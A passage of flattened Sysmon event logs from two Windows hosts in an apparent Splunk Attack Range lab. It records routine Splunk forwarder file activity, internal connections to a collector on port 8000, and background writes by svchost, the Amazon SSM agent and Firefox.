Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297499Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:21.078{C8EA50B7-1785-6216-2F07-000000003802}6252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000221305Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:22.595{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A5A25A8404DA4BD2DF499B8ED6104AC,SHA256=62D69217BD0A923C36CD9BCCADC09E735C3711F2D2FE08C7ED2C8A2C2DAEE00F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297509Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:22.749{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7560CA31F9466579B40D6F6E7102DE26,SHA256=F43EE25B511230A1AA6E68850FFBF465AC204301C231B3B47665B42AA7837BE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221306Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:23.626{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=471A5E75892745E149D18E119D174299,SHA256=1D9C113B466013BF23DF2A8EBC863899A23AE832AD9DD65CE9463219817B0002,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297511Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:23.783{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDB18A6A770F63A6A28ADBAB827BA6CC,SHA256=859BE389D0A44718B57A0E2BFAE72B174A5DC5D8B7A9AC2A9A9D484C7B3CB203,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297510Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:20.618{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49451-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000297512Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:24.800{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B32ED8C1066067B653E862E77BDB58C5,SHA256=3194CF093B397B25D60A2EB21F22976277F2FFC2C4C5621AC5E7C5C8E802EBAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221308Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:24.673{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50A13D8F4519EA018E132558217F061C,SHA256=52FC3C1437DD40FB46855D20CBB567E24D5A36C220F8C3B1356C429E4EF326E3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221307Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:21.593{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51642-false10.0.1.12-8000- 23542300x8000000000000000297515Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:25.825{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8EF8B07A1387402F574FB73A2317D4C,SHA256=2D0187309BBD21D3B98388EB9CB09CE5A57D64152487BCF548F2C55006EC2D39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221309Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:25.720{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB79023AE6BE318EDA7E080041166F8C,SHA256=6176921AB9C8D1DD9436C2EF7CCD9C8DEE815F90AA2593E0C13A2CB35E8FB857,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000297514Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:25.415{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\SiteSecurityServiceState.txt2022-02-22 11:23:49.748 23542300x8000000000000000297513Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:25.415{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\SiteSecurityServiceState.txtMD5=0FF2CA91B7D5F34319349209E4E82D23,SHA256=9DF82B6E9FDB1F81D812BD1AC113B2A415B9326638B2FF07398E8BBB929C9D82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297516Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:26.840{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=381E96620301888F13923CEF629E4674,SHA256=73FA29F7862218F06867E4F8C9315E7804664718C3DC67DB6F71C9C124CF8F1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221310Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:26.798{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAF59019DF42D2D82DABA5EFF3E82F69,SHA256=50AF745A16653B611597E210E0B5B620EACD21FF08147F6EFFF590C3736D95F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221311Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:27.892{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4758838C016DC318B32B39C480F324F5,SHA256=B15E0F84EE4EDC4174CB4E2E14C2C1B2A890F8E1668EDF1B4FEE8BD07EA1B9E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297518Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:27.849{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E2D029F3181217F29F0899C13D1E1F9,SHA256=2ECF315AFE74D59878F92251F3F92A0913310FA6AC49EC42818CC2D41E5A5C96,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297517Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:25.645{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49452-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000297519Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:28.863{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=556C5569D7638F71898A7EA85F098D02,SHA256=186350CAF1CB033A03444ED53BF204744CA6DE6980550085C7D8F42EA6BC4381,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297520Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:29.879{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD1E404E874A41504C789184663C01C1,SHA256=45A3C7F5BAA618993F1ADB07BF831598D086371B4E0BED1F0A25870A225FDCC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221312Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:29.095{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AAA15B5BC7CF77E50FA6BB9F5D343DF,SHA256=CBA472FEB1925A66055849FF77D62484782E9CC78895DAE5BA4533F5262490EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297521Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:30.898{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D52088F699B32C1BF5392956CC6FE5E3,SHA256=527910E8B21D5053FF380D263CDF218E7A25A77DBB9AB19EFF01A853260FCC13,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221315Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:27.608{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51643-false10.0.1.12-8000- 23542300x8000000000000000221314Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:30.454{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=C0836B5A9654CC41F27A096FDB549B60,SHA256=03602D352A9A39B7B1CAA64DFF061B32E6502456B2F4E57A7B544AD3DD1F688B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221313Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:30.236{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22EF3424AD90B874EFDDAC5025A8570C,SHA256=1FB01F47FBBA9AC85FCB9E7434990AD85C9F7960EE7130439C4DBE3456BA1E7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297522Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:31.915{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CCC26F4DD5D55FDBA83CA14AB5224D9,SHA256=019656416992CC80C5B936847B7BDBB781770F1FB858EE21A19008A043E4B563,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221316Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:31.376{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3CBB23DD101370109CD7DBDDC9783D5,SHA256=0FED79D1EB9D2DD5BE13C6AEB855EEEB2FB5374E34A464299C790B62AAEB8EDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297524Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:32.926{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64B13E913EB387D3929F1C4F474D5BCD,SHA256=2816BEA67EB486C8039574B5346CC613C8F06A5CACFCE01235C6C601402EED56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221317Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:32.439{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70462F8AE1C8FA61EA9EC906AD759793,SHA256=52FE42229FC5A5615D89702956FF860F30577D03F450F24AF23892FB88D2E101,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297523Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:30.712{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49453-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000297526Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:33.942{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7E01A9B86699AF646C68CBE4D699CEB,SHA256=4D934EB295107021D2E3D1186F40874C37DA85A1E264183CE42BD705E183E7EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221318Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:33.439{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51DF1CAE519EE183F1F27566AB685051,SHA256=8D58B68562FF7E3F87F0BAFC4347741A7C2E3A831657780C5FEDE597A5A42003,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297525Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:33.573{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=0302A7CB25A62A1BD0C9D2B282D4CDE7,SHA256=CCFA4F598A57B0E38E5F0E75EB84404A338B5795F8B1747DE2A689D873BBD5B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297527Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:34.948{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E2A54BE90D9B63290DA6F2516DBAADD,SHA256=DE4531B0EF2F1D460A9AD564E93F13BA882D838D739928C0BB9E8A65BA78B99B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221319Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:34.439{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=635D6E85CD461E6582744525D06C021B,SHA256=8A96BC04C50D9D0D6597974C9EDCAC5FBF07EADC1CDE0BE6D33D04823DA97E28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297528Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:35.956{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75F5C6296A712666BF76EEC24EAF4FA8,SHA256=C81D2205A76D9622AF07C3E5620E3BD7CC7AEA9C4901B0CFFA371E0E972BBE45,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221321Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:33.578{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51644-false10.0.1.12-8000- 23542300x8000000000000000221320Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:35.440{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F936FE0BD7E75DC1EFF4E3533B46006,SHA256=663F61982DB2D9C1D6428D512F87F9AEFF3B918DE139D78B8598F23E088A3372,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297529Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:36.971{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=319880A67BBB86602468E2272FC15B2C,SHA256=226DCC1F4F3DF1BE98A1958DE08D629D2E51D4170103B4B9DCBDABB6BB5E5884,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221323Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:36.477{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-159MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221322Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:36.443{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81DF64BD9CA9381B6F72FE75C31B53DD,SHA256=D8A817D439444BFD0E190AD47708832B67F4A4E8EFDCBF2690F8279A87CC276D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297532Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:37.973{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B285B7E2CFA846D9CBD89BA2C8C2B7E3,SHA256=E845B345D4C8B885FE64D3D8D1CD0A58FAF95C66A5A945FC04873944348CC7E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221325Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:37.476{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-160MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221324Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:37.444{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC01E9E4425C51F042A8AE55F4E6B732,SHA256=207D96D1EAC13A2F3A0370A43DFBEE41289B49851E557BA7EF0A9716F42AA9A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297531Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:37.626{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297530Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:37.622{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=DDDDDB57C918B8BC7272E152073ED441,SHA256=06D11DDF39DCBF1775451D2B002CCE22D37BC5864746F0B9B4A87B5785855DEA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297533Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:36.546{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49454-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000221326Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:38.459{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B552B75B11614AF7428139DAFA929ED2,SHA256=20E3E96D146146BA12C0ABDB1364A0B287390A391CD82FBC2F537260C19407AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221327Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:39.459{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBF898EE617C7D2109D1E20821265106,SHA256=98C161655AEAF2057A7C17D13CC918210B64D79FF954CE07D0FEAC00365F9172,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297534Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:39.036{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program 